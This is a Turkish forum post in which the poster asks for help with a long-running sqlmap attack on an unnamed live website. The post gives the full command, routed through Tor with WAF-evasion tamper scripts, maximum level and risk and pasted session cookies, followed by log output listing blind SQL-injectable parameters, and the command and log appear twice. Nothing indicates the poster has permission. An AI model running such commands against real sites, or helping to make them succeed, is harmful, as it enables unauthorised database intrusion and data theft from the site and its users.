İyi günler uzun zamandır bir site üzerinde sqlmap kullanarak açık arıyorum. Sqlmap aracı enjekte edebileği kısımlar buluyor fakat tarama sonunda bir sonuç alamıyor. Aşağıda kullandığım komutu ve çıktıları verdim. Anlamadığım sorun nedir site üzerinde açık yok mu? Yoksa bile injectable kısımları çıkıyor. Bilen arkadaşlar yardımcı olabilir mi? Teşekkürler..
Sqlmap Komutu;
sqlmap -u "hedef site" --tor-port=9050 --tor-type=SOCKS5 --tamper="between,randomcase,space2comment,charencode" --random-agent --level=5 --risk=3 --batch --time-sec=5 --threads=1 --dbs --cookie="__cfduid=de0dd1e9be3d91c1d2d2d934f9e883dfa1485121567; JSESSIONID=9CF6012F0722E77CA392E3C6FEBFCA76.ip-172-31-36-84; AWSELB=F741CD6114FD29632AF2E47381737A19678C423CFDFF4F904A59170D70D036594CABF9C4DD00FE17CE3ED9F6A887F81DCEAA6AF24368D98F11B9B75D613BBFC55532E850E4; __cuadse=95150392.1485121584809; ru=1; __cuadst=95150392.1485121621060; __zlcmid=eigAdfY3JIFYBX"
Sonuçlar
[04:22:24] [INFO] GET parameter cv appears to be OR boolean-based blind - WHERE or HAVING clause (Generic comment) injectable
[04:42:05] [INFO] GET parameter c appears to be OR boolean-based blind - WHERE or HAVING clause injectable
[05:38:16] [INFO] GET parameter v appears to be PostgreSQL boolean-based blind - Parameter replace injectable
[05:52:26] [INFO] GET parameter _ appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[06:12:59] [INFO] Referer parameter Referer appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[06:48:08] [INFO] User-Agent parameter User-Agent appears to be OR boolean-based blind - WHERE or HAVING clause injectable
[06:57:14] [INFO] Cookie parameter __cfduid appears to be OR boolean-based blind - WHERE or HAVING clause (NOT) injectable
[07:24:58] [INFO] Cookie parameter __cuadse appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[07:38:09] [INFO] Cookie parameter ru appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[08:01:22] [INFO] Cookie parameter __cuadst appears to be AND boolean-based blind - WHERE or HAVING clause injectable
Sqlmap Komutu;
sqlmap -u "hedef site" --tor-port=9050 --tor-type=SOCKS5 --tamper="between,randomcase,space2comment,charencode" --random-agent --level=5 --risk=3 --batch --time-sec=5 --threads=1 --dbs --cookie="__cfduid=de0dd1e9be3d91c1d2d2d934f9e883dfa1485121567; JSESSIONID=9CF6012F0722E77CA392E3C6FEBFCA76.ip-172-31-36-84; AWSELB=F741CD6114FD29632AF2E47381737A19678C423CFDFF4F904A59170D70D036594CABF9C4DD00FE17CE3ED9F6A887F81DCEAA6AF24368D98F11B9B75D613BBFC55532E850E4; __cuadse=95150392.1485121584809; ru=1; __cuadst=95150392.1485121621060; __zlcmid=eigAdfY3JIFYBX"
Sonuçlar
[04:22:24] [INFO] GET parameter cv appears to be OR boolean-based blind - WHERE or HAVING clause (Generic comment) injectable
[04:42:05] [INFO] GET parameter c appears to be OR boolean-based blind - WHERE or HAVING clause injectable
[05:38:16] [INFO] GET parameter v appears to be PostgreSQL boolean-based blind - Parameter replace injectable
[05:52:26] [INFO] GET parameter _ appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[06:12:59] [INFO] Referer parameter Referer appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[06:48:08] [INFO] User-Agent parameter User-Agent appears to be OR boolean-based blind - WHERE or HAVING clause injectable
[06:57:14] [INFO] Cookie parameter __cfduid appears to be OR boolean-based blind - WHERE or HAVING clause (NOT) injectable
[07:24:58] [INFO] Cookie parameter __cuadse appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[07:38:09] [INFO] Cookie parameter ru appears to be AND boolean-based blind - WHERE or HAVING clause injectable
[08:01:22] [INFO] Cookie parameter __cuadst appears to be AND boolean-based blind - WHERE or HAVING clause injectable
